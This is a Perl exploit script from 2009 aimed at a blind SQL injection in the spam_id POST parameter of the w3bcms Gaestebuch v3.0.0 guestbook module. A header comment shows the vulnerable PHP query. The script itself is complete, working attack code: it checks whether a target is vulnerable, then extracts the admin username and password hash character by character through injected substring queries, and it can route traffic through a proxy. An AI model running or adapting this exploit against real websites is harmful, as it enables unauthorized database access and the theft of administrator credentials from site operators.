#!/usr/bin/perl use LWP::UserAgent; use HTTP::Request::Common qw(POST); use Getopt::Long; # \#'#/ # (-.-) # ------------------oOO---(_)---OOo----------------- # | __ __ | # | _____/ /_____ ______/ /_ __ ______ ______ | # | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ | # | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) | # | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ | # | Security Research Division /____/ 2oo9 | # -------------------------------------------------- # | w3bcms Gaestebuch v3.0.0 Blind SQL Injection | # | (requires magic_quotes_gpc = Off) | # -------------------------------------------------- # [!] Discovered.: DNX # [!] Vendor.....: http://www.w3bcms.de # [!] Detected...: 26.03.2009 # [!] Reported...: 29.03.2009 # [!] Response...: xx.xx.2009 # # [!] Background.: CMS features in the frontend: # » Ausgabe angelegter Seiten # » Integrierter sicherer Spamschutz (kein Captcha!) # » CMS Features wie Slogan Rotation, Datumausgabe, Seitenanzeige # » Integrierter Besuchercounter (versteckt/sichtbar) # » Sicherheit gegen Hackangriffe # » Schnelle Datenbankabfragen # » 100% Suchmaschinenoptimiert (SEO) # » Erweiterbar durch Module & Addons # » Unterstützt Mod Rewrite URL's (optional) # # [!] Bug........: $_POST['spam_id'] in includes/module/book/index.inc.php near line 42 # # 37: } else if (isset($_GET['action']) && $_GET['action'] == "eintragen" && $modul_settings['aktiv'] == "0") { # 38: # 39: $_POST['spamschutz'] = mysql_real_escape_string($_POST['spamschutz']); # 40: $_POST['spamschutz'] = strtolower($_POST['spamschutz']); # 41: # 42: $data = mysql_fetch_assoc(mysql_query("SELECT * FROM spamschutz WHERE id='".$_POST['spam_id']."' AND antwort='".$_POST['spamschutz']."'")); # # [!] Solution...: no response from vendor but the vendor has updated the module package # if(!$ARGV[2]) { print "\n \\#'#/ "; print "\n (-.-) "; print "\n ----------------oOO---(_)---OOo-----------------"; print "\n | w3bcms Gaestebuch v3.0.0 Blind SQL Injection |"; print "\n | coded by DNX |"; print "\n ------------------------------------------------"; print "\n[!] Usage: perl w3bcms.pl [Target] "; print "\n[!] Example: perl w3bcms.pl -2 -u \"http://127.0.0.1/w3b/index.php?seite=2.gaestebuch\""; print "\n[!] Targets:"; print "\n -1 Get admin username"; print "\n -2 Get admin password hash"; print "\n[!] Options:"; print "\n -u [url] URL to vuln website"; print "\n -p [ip:port] Proxy support"; print "\n"; exit; } my %options = (); GetOptions(\%options, "1", "2", "u=s", "p=s"); my $ua = LWP::UserAgent->new(); my $target = $options{"u"}."&action=eintragen"; if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); } print "[!] Exploiting...\n"; check_bug($target); if($options{"1"}) { get_username($target); } elsif($options{"2"}) { get_password($target); } print "\n[!] Exploit done\n"; sub check_bug { my $url = shift; syswrite(STDOUT, "[!] Checking bug @ website: " , 28); my $inj = "' or 1=1/*"; my $req = POST $url, [spam_id => $inj]; my $res = $ua->request($req); if($res->content =~ /Bitte geben Sie Ihren Namen an/) { syswrite(STDOUT, "vuln", 4); print "\n"; } else { syswrite(STDOUT, "not vuln", 8); exit; } } sub get_username { my $target = shift; syswrite(STDOUT, "[!] Get username: ", 18); for(my $i = 1; $i <= 32; $i++) { my $found = 0; my $h = 32; while(!$found && $h <= 126) { if(exploit($target, $i, $h, "benutzername")) { $found = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } sub get_password { my $target = shift; syswrite(STDOUT, "[!] Get Hash: ", 14); for(my $i = 1; $i <= 32; $i++) { my $found = 0; my $h = 48; while(!$found && ($h <= 57 || $h <= 102)) { if(exploit($target, $i, $h, "passwort")) { $found = 1; syswrite(STDOUT, chr($h), 1); } if($h == 57) { $h = 97; } else { $h++; } } } } sub exploit { my $url = shift; my $i = shift; my $h = shift; my $c = shift; my $inj = "' or 1=1 and substring((select ".$c." FROM admin limit 1),".$i.",1)=CHAR(".$h.")/*"; my $req = POST $url, [spam_id => $inj]; my $res = $ua->request($req); if($res->content =~ /Bitte geben Sie Ihren Namen an/) { return 1; } else { return 0; } }